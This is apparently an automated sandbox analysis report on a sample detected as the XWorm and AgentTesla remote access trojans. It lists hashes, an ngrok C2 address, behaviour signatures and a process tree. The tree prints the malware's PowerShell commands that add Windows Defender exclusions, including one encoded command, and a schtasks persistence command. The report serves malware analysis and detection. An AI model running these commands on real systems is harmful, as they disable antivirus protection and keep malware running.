Analysis

  • max time kernel
    145s
  • max time network
    54s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-06-2024 16:00

General

  • Target

    04709443bf8956006d0f13a21e4d419c2f14b69b2d22ad62b52e10c1d896c860_NeikiAnalytics.exe

  • Size

    1.8MB

  • MD5

    93bab175f87cf76fb8247d78bcfedab0

  • SHA1

    3432a30b942f87784bdc677854298312b670a6bd

  • SHA256

    04709443bf8956006d0f13a21e4d419c2f14b69b2d22ad62b52e10c1d896c860

  • SHA512

    fb114f76422826e4d1a1d7aca5a97d9593d03b95e27920aa4f6f5c446f320c4022b388c01f49df625c2e268f9e5152b06bd6936b6b5484db2f14032a3e2dc696

  • SSDEEP

    24576:LTZth+nZm+GEbfOlSlEiGHzCa0etEQ+ZVY7jzSbknaphQVuQiUJDRcH2JmxnYqqc:LH+QQE4GT1qjrY7agnP0QpXJmxj82Rn

Malware Config

Extracted

Family

xworm

C2

1.tcp.sa.ngrok.io:22405

Attributes
  • Install_directory

    %AppData%

  • install_file

    dwm.exe

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • AgentTesla payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\04709443bf8956006d0f13a21e4d419c2f14b69b2d22ad62b52e10c1d896c860_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\04709443bf8956006d0f13a21e4d419c2f14b69b2d22ad62b52e10c1d896c860_NeikiAnalytics.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2444
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAbgBuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAZABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AbABlACMAPgA="
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3240
    • C:\Users\Admin\AppData\Local\Temp\Zimo Free2.exe
      "C:\Users\Admin\AppData\Local\Temp\Zimo Free2.exe"
      2⤵
      • Executes dropped EXE
      • Enumerates system info in registry
      • Suspicious use of AdjustPrivilegeToken
      PID:228
    • C:\Windows\dwm.exe
      "C:\Windows\dwm.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3144
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\dwm.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1876
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dwm.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4124
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\dwm.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:612
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dwm.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1672
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "dwm" /tr "C:\Users\Admin\AppData\Roaming\dwm.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3292
  • C:\Users\Admin\AppData\Roaming\dwm.exe
    C:\Users\Admin\AppData\Roaming\dwm.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:896
  • C:\Users\Admin\AppData\Roaming\dwm.exe
    C:\Users\Admin\AppData\Roaming\dwm.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4900

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dwm.exe.log

    Filesize

    654B

    MD5

    2ff39f6c7249774be85fd60a8f9a245e

    SHA1

    684ff36b31aedc1e587c8496c02722c6698c1c4e

    SHA256

    e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

    SHA512

    1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    d775b6d7bb7ad804668df75a5e9b9455

    SHA1

    567110dd4bd79f341697cff48d777584a06f75b5

    SHA256

    6cd235d2bc6d8c4e8281b81956156391290a02aea8306e8bc10c771e6ba3622c

    SHA512

    a3e78f52ef042adbd4ca9475864c69d3e981fcbe111b8df16ad1e21e61e2c4da4d159fdbd80995e7214697385140c0afc315cc32d7f8a4cd4fa943ca9d175a6a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    ce4540390cc4841c8973eb5a3e9f4f7d

    SHA1

    2293f30a6f4c9538bc5b06606c10a50ab4ecef8e

    SHA256

    e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105

    SHA512

    2a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    2a4825f4f95c5d3d72911c6e7eb902ca

    SHA1

    4c22133f24e77211313beb0831980029a53e7dde

    SHA256

    59eecad327a693c8b2e3a5932238cda2141c6a0afbba6a5587933c9f2c1025e0

    SHA512

    8e09a61c62a4b83f4f323b5b74f89cc26d708fd1fe646317f5f404af8d4d3fcf327f20f5e4a3b310786c0f639df2d17e1a51def08c95fa964928ad6c08c81386

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    65a68df1062af34622552c4f644a5708

    SHA1

    6f6ecf7b4b635abb0b132d95dac2759dc14b50af

    SHA256

    718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35

    SHA512

    4e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d

  • C:\Users\Admin\AppData\Local\Temp\Zimo Free2.exe

    Filesize

    1.6MB

    MD5

    3d0cf751fb32bf70ed4f71aabebb3510

    SHA1

    9cb2daa219930db66e9fbc0fdbd163b9ea530176

    SHA256

    0469f50854f0dde4fe6c3f21ce5718f8fce4d93b7c7f5c3d87a3be63cf8c8ca4

    SHA512

    00f5087887146714b6d0e4c7db9eafe272acf590046a2ddba359c4cebda16ce8b64ec88095bdb5887e16546af9df255a30f9da1fc16862884638b75d5b23ad1b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g1ahjvi4.dzm.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Windows\dwm.exe

    Filesize

    65KB

    MD5

    cd65113a412150ecdc63837ab1bfe9ba

    SHA1

    c691b213aa095d0c5b1e724c3121ecc28409735d

    SHA256

    06439b356cd3345f9e95eeee776e855c1ed77a9e445de6ce8bdd1765b9157326

    SHA512

    ed2ce053a16649d5866bc81a9602f8b9f22dd87d8651657783d0196ec9c1b7fbdd9390099b99a8f5bc07f0830fb4ac0be469ee3bd7ea160348a9e2df699eaeb7

  • memory/228-28-0x000001F52BA20000-0x000001F52BA3A000-memory.dmp

    Filesize

    104KB

  • memory/228-47-0x00007FFC0ADF0000-0x00007FFC0B8B1000-memory.dmp

    Filesize

    10.8MB

  • memory/228-98-0x00007FFC0ADF0000-0x00007FFC0B8B1000-memory.dmp

    Filesize

    10.8MB

  • memory/228-97-0x00007FFC0ADF0000-0x00007FFC0B8B1000-memory.dmp

    Filesize

    10.8MB

  • memory/228-15-0x000001F511460000-0x000001F511608000-memory.dmp

    Filesize

    1.7MB

  • memory/228-32-0x000001F52BC60000-0x000001F52BE74000-memory.dmp

    Filesize

    2.1MB

  • memory/228-27-0x000001F5132A0000-0x000001F5132B2000-memory.dmp

    Filesize

    72KB

  • memory/2444-2-0x00007FFC0ADF0000-0x00007FFC0B8B1000-memory.dmp

    Filesize

    10.8MB

  • memory/2444-35-0x00007FFC0ADF0000-0x00007FFC0B8B1000-memory.dmp

    Filesize

    10.8MB

  • memory/2444-1-0x0000000000740000-0x0000000000908000-memory.dmp

    Filesize

    1.8MB

  • memory/2444-0-0x00007FFC0ADF3000-0x00007FFC0ADF5000-memory.dmp

    Filesize

    8KB

  • memory/3144-34-0x0000000000680000-0x0000000000696000-memory.dmp

    Filesize

    88KB

  • memory/3240-50-0x00007FFC0ADF0000-0x00007FFC0B8B1000-memory.dmp

    Filesize

    10.8MB

  • memory/3240-33-0x00007FFC0ADF0000-0x00007FFC0B8B1000-memory.dmp

    Filesize

    10.8MB

  • memory/3240-29-0x00007FFC0ADF0000-0x00007FFC0B8B1000-memory.dmp

    Filesize

    10.8MB

  • memory/3240-42-0x000001AD55680000-0x000001AD556A2000-memory.dmp

    Filesize

    136KB

  • memory/3240-36-0x00007FFC0ADF0000-0x00007FFC0B8B1000-memory.dmp

    Filesize

    10.8MB